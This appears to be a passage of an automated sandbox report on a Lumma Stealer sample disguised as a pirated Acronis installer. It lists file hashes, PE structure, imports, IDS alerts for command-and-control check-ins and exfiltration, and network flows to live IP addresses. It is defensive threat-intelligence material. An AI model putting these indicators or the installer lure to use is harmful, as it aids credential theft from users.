                                                                                                                                                                                                                                        Size (bytes):943784
                                                                                                                                                                                                                                        Entropy (8bit):6.621472142472864
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                                                                                                        MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                                        SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                                                                                                        SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                                                                                                        SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5676923
                                                                                                                                                                                                                                        Entropy (8bit):6.275861681921798
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:bvHzDf6dXE4A8rChULBDqifkxGVZVB2nz:rnmBDN4z
                                                                                                                                                                                                                                        MD5:2BFAE5A9C25EB28D8C281E420F8DC220
                                                                                                                                                                                                                                        SHA1:1824797CD8BC62628818066DB7E075616CCF2D33
                                                                                                                                                                                                                                        SHA-256:C5249A0DD9846F2AC173C6AAEE47DDD022DD498AF59AB53FD275FDA1966A16CB
                                                                                                                                                                                                                                        SHA-512:DA1FF02AA4AE9A090FE10730AB52693592B4830B169DB2ACF99EF0412EE4FCBC1A1E0E1A5B5E511E0A7470905058C67011A0B5F1CC7E69D043B4790273447AF9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:X!q...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X!q.....................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49268
                                                                                                                                                                                                                                        Entropy (8bit):7.996032002835928
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:DMM7WgDAShQzXj+0dgGTI0A9XsiTN1WMZR7/PeP8nzo3oCsCe2eZJtbiGx3i:DrPDAfbp5xqXsKXPmx3oCMfbiGxS
                                                                                                                                                                                                                                        MD5:8FD58F1FD430FCA2CD8F3CB6B5597892
                                                                                                                                                                                                                                        SHA1:DE00E7313D13EB684F87CF72687D665869E0446A
                                                                                                                                                                                                                                        SHA-256:0310A91F85E03C06D209BAC2BEA6911EBF26AF56BE1C715ABE76CFE597F0F697
                                                                                                                                                                                                                                        SHA-512:38B9F3DB432445517B882101DE804D660291F1649995AB5D3F7BF828E3200B79399CBA16A76FDC663B5F7F8CCD8D6C0D19D071847181CDF61A32706D2D9230E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............T...3.2.T...3.2kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T.."..f.....'......b~....9..a...-.s..T..eL{2.T...3.2m.....Od..8.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o....Q..5.....4h. .`.'....pl....R.....$.o...H..........b..y<...:(..K........S.nr.JW..'.Y%.......O.K.n.B...J..-L.q..L......dZ.O..\.7b....2.6.d.Y...\..0......T.U..[.B.}.&#x.g..d.8..k.>.Gs!/&K!3..f...^...}.....i.Dr..Vy..0..StH.5..{......}.......^...."89..k...F.Y$......9L.LFU.t.....V........Jsz
                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):0.38870031100602437
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.72%
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.68%
                                                                                                                                                                                                                                        • Windows ActiveX control (116523/4) 0.58%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                        File name:acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File size:829'879'991 bytes
                                                                                                                                                                                                                                        MD5:2c83fb776a9e238d88e32393f17ae06a
                                                                                                                                                                                                                                        SHA1:d74323c285d31ecd483e25c86e21222ca38ab227
                                                                                                                                                                                                                                        SHA256:cb9670d377d8e1d3c11c63dc0e87f02339723ab2d88d10425a905437f6edb5a3
                                                                                                                                                                                                                                        SHA512:fa647e65a6ad168fb580e95afb4f55ff343c87b28e60f7989ab074cc1baa798773810eed13a1bec93a4bb886d891c30518c1a2d5fd1b00df4ed0a79712cc91d3
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        TLSH:
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...f...B...8.....
                                                                                                                                                                                                                                        Icon Hash:7efe9a0bc7e76733
                                                                                                                                                                                                                                        Entrypoint:0x4038af
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                        Signature Valid:
                                                                                                                                                                                                                                        Signature Issuer:
                                                                                                                                                                                                                                        Signature Validation Error:
                                                                                                                                                                                                                                        Error Number:
                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                            Version:
                                                                                                                                                                                                                                            Thumbprint MD5:
                                                                                                                                                                                                                                            Thumbprint SHA-1:
                                                                                                                                                                                                                                            Thumbprint SHA-256:
                                                                                                                                                                                                                                            Serial:
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            sub esp, 000002D4h
                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                                                                            xor ebp, ebp
                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                            mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                            mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                            mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                            call dword ptr [00409030h]
                                                                                                                                                                                                                                            push 00008001h
                                                                                                                                                                                                                                            call dword ptr [004090B4h]
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            call dword ptr [004092C0h]
                                                                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                                                                            mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                            call 00007FEC755B69BBh
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            push 000002B4h
                                                                                                                                                                                                                                            mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            push 0040A264h
                                                                                                                                                                                                                                            call dword ptr [00409184h]
                                                                                                                                                                                                                                            push 0040A24Ch
                                                                                                                                                                                                                                            push 00476AA0h
                                                                                                                                                                                                                                            call 00007FEC755B669Dh
                                                                                                                                                                                                                                            call dword ptr [004090B0h]
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            mov edi, 004CF0A0h
                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                            call 00007FEC755B668Bh
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            call dword ptr [00409134h]
                                                                                                                                                                                                                                            cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                            mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                            mov eax, edi
                                                                                                                                                                                                                                            jne 00007FEC755B3F8Ah
                                                                                                                                                                                                                                            push 00000022h
                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                            mov eax, 004CF0A2h
                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            call 00007FEC755B6361h
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            call dword ptr [00409260h]
                                                                                                                                                                                                                                            mov esi, eax
                                                                                                                                                                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                            jmp 00007FEC755B4013h
                                                                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                                                            cmp ax, bx
                                                                                                                                                                                                                                            jne 00007FEC755B3F8Ah
                                                                                                                                                                                                                                            add esi, 02h
                                                                                                                                                                                                                                            cmp word ptr [esi], bx
                                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                            • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x6f4ea.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x16d7320x2958
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .rsrc0x1000000x6f4ea0x6f6004a99cec358e39cb06ea38a8072526404False0.8860238671436588data7.633058654397923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .reloc0x1700000xfd60x10007af67ceeee6e1f9fb0dc35ef8f7bdebcFalse0.597900390625data5.574366794614882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_ICON0x1003840x46843PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9962781518860249
                                                                                                                                                                                                                                            RT_ICON0x146bc80x22b9PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0012374845314433
                                                                                                                                                                                                                                            RT_ICON0x148e840x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5441415785191213
                                                                                                                                                                                                                                            RT_ICON0x14b4ec0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6197632058287796
                                                                                                                                                                                                                                            RT_ICON0x14c6140x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7615248226950354
                                                                                                                                                                                                                                            RT_ICON0x14ca7c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.7828014184397163
                                                                                                                                                                                                                                            RT_ICON0x14cee40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.6174953095684803
                                                                                                                                                                                                                                            RT_ICON0x14df8c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.5445020746887966
                                                                                                                                                                                                                                            RT_ICON0x1505340x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.45823967822075
                                                                                                                                                                                                                                            RT_ICON0x160d5c0xe1a1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9995844947282768
                                                                                                                                                                                                                                            RT_DIALOG0x16ef000x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                            RT_DIALOG0x16f0000x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                            RT_DIALOG0x16f11c0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                            RT_GROUP_ICON0x16f17c0x4cdata0.8289473684210527
                                                                                                                                                                                                                                            RT_GROUP_ICON0x16f1c80x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                                                                                                                            RT_MANIFEST0x16f2140x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                            USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2024-12-23T10:35:29.900273+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649701172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:30.680014+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1649701172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:30.680014+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649701172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:31.902946+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649702172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:32.670883+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1649702172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:32.670883+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649702172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:34.403283+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649703172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:36.708516+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649704172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:39.155246+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649705172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:41.501174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649706172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:42.313661+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1649706172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:44.561219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649707172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:44.565019+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.1649707172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:47.430212+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649708172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:48.489015+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649708172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:50.025436+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649709172.67.182.135443TCP
                                                                                                                                                                                                                                            2024-12-23T10:35:52.533661+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.164971045.66.248.134443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:04.160666+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649713172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:05.216655+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1649713172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:05.216655+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649713172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:06.433805+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649714172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:07.234528+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1649714172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:07.234528+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649714172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:08.927664+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649715172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:11.225911+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649716172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:12.366139+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1649716172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:13.871555+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649717172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:16.247344+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649718172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:18.521402+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649719172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:18.525635+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.1649719172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:21.021576+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649720172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:21.780501+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649720172.67.129.49443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:22.922853+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649721172.67.182.135443TCP
                                                                                                                                                                                                                                            2024-12-23T10:36:24.194307+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.164972245.66.248.134443TCP
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.678555012 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.678606033 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.678679943 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.679811001 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.679824114 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.900196075 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.900273085 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.901844978 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.901860952 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.902259111 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.944561005 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.944586992 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:29.944664001 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.680023909 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.680118084 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.680181980 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.681941032 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.681982994 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.682014942 CET49701443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.682045937 CET44349701172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.689749956 CET49702443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.689805984 CET44349702172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.689888000 CET49702443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.690165997 CET49702443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:30.690177917 CET44349702172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:31.902862072 CET44349702172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:31.902945995 CET49702443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:31.904165983 CET49702443192.168.2.16172.67.129.49
